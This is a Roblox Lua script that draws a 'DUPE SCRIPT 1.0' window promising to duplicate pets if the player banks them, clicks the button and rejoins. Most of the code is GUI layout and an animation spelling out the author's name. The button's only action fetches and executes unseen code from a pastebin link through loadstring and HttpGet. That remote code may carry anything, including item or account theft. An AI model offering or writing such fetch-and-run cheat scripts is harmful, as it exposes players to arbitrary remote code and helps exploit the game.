-- Made By:Collin

local DupeGui = Instance.new("ScreenGui")
local Frame = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local Frame_2 = Instance.new("ImageLabel")
local Start = Instance.new("TextButton")

--Properties:

DupeGui.Name = "DupeGui"
DupeGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
DupeGui.ResetOnSpawn = false
--gui 
Frame.Name = "Frame"
Frame.Parent = DupeGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 1.000
Frame.Position = UDim2.new(0.356725156, 0, 0.352592587, 0)
Frame.Size = UDim2.new(0, 352, 0, 221)
Frame.Image = "rbxassetid://3570695787"
Frame.ImageColor3 = Color3.fromRGB(0, 0, 0)
Frame.ImageTransparency = 0.010
Frame.ScaleType = Enum.ScaleType.Slice
Frame.SliceCenter = Rect.new(100, 100, 100, 100)
Frame.SliceScale = 0.100
Frame.Active = true
Frame.Draggable = true
--text na dole
TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel.Position = UDim2.new(-0.00384090934, 0, 0.884511352, 0)
TextLabel.Size = UDim2.new(0, 376, 0, 25)
TextLabel.Font = Enum.Font.SourceSansBold
TextLabel.Text = "Put the pets in the bank, click dupe and rejoin"
TextLabel.TextColor3 = Color3.fromRGB(192, 192, 192)
TextLabel.TextSize = 15.000
--tytul
TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 0.800
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel_2.Position = UDim2.new(-0.00122937292, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 352, 0, 49)
TextLabel_2.Font = Enum.Font.SourceSansBold
TextLabel_2.Text = "DUPE SCRIPT 1.0"
TextLabel_2.TextColor3 = Color3.fromRGB(173, 0, 255)
TextLabel_2.TextSize = 40.000

--text
TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
TextLabel_3.Font = Enum.Font.ArialBold
TextLabel_3.TextColor3 = Color3.fromRGB(173, 0, 255)
TextLabel_3.TextSize = 25.000

--button
Frame_2.Name = "Frame"
Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
Frame_2.BackgroundTransparency = 1.000
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
Frame_2.Size = UDim2.new(0, 182, 0, 46)
Frame_2.Image = "rbxassetid://3570695787"
Frame_2.ImageColor3 = Color3.fromRGB(64, 64, 64)
Frame_2.ScaleType = Enum.ScaleType.Slice
Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
Frame_2.SliceScale = 0.050
--button text
Start.Name = "Start"
Start.Parent = Frame_2
Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Start.BackgroundTransparency = 1.000
Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
Start.Size = UDim2.new(0, 182, 0, 46)
Start.Font = Enum.Font.LuckiestGuy
Start.LineHeight = 0.750
Start.Text = "DUPE"
Start.TextColor3 = Color3.fromRGB(173, 0, 255)
Start.TextSize = 20.000

-- Scripts:

local function IUHI_fake_script() -- TextLabel_2.Script 
	local script = Instance.new('Script', TextLabel_2)
end    
coroutine.wrap(IUHI_fake_script)()
local function PREXT_fake_script() -- TextLabel_3.Changing text 
	local script = Instance.new('Script', TextLabel_3)

	while true do
	script.Parent.Text = "S"
	wait(.5)
	script.Parent.Text = "Sc"
	wait(.5)
	script.Parent.Text = "Scri"
	wait(.5)
	script.Parent.Text = "Scrip"
	wait(.5)
	script.Parent.Text = "Script"
	wait(.5)
	script.Parent.Text = "Script B"
	wait(.5)
	script.Parent.Text = "Script By"
	wait(.5)
	script.Parent.Text = "Script By M"
	wait(.5)
	script.Parent.Text = "Script By Mr"
	wait(.5)
	script.Parent.Text = "Script By Mr.C"
	wait(.5)
	script.Parent.Text = "Script By Mr.Co"
	wait(.5)
	script.Parent.Text = "Script By Mr.Col"
	wait(.5)
	script.Parent.Text = "Script By Mr.Coll"
	wait(.5)
	script.Parent.Text = "Script By Mr.Colli"
	wait(.5)
	script.Parent.Text = "Script By Mr.Collin"
	wait(.5)
    script.Parent.Text = "Script By Mr.Colli"
	wait(.5)
    script.Parent.Text = "Script By Mr.Coll"
	wait(.5)
    script.Parent.Text = "Script By Mr.Col"
	wait(.5)
    script.Parent.Text = "Script By Mr.Co"
	wait(.5)
    script.Parent.Text = "Script By Mr.C"
	wait(.5)
    script.Parent.Text = "Script By Mr"
	wait(.5)
    script.Parent.Text = "Script By M"
	wait(.5)
    script.Parent.Text = "Script By"
	wait(.5)
    script.Parent.Text = "Script B"
	wait(.5)
    script.Parent.Text = "Script"
	wait(.5)
    script.Parent.Text = "Scrip"
	wait(.5)
    script.Parent.Text = "Scri"
	wait(.5)
    script.Parent.Text = "Scr"
	wait(.5)
    script.Parent.Text = "Sc"
	wait(.5)
    script.Parent.Text = "S"
	wait(.5)

	end 
end
coroutine.wrap(PREXT_fake_script)()
local function LPNFV_fake_script() -- DupeGui.Script 
	local script = Instance.new('Script', DupeGui)

	Start.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://pastebin.com/kk1gLaX7"))()

	end)
end
coroutine.wrap(LPNFV_fake_script)()
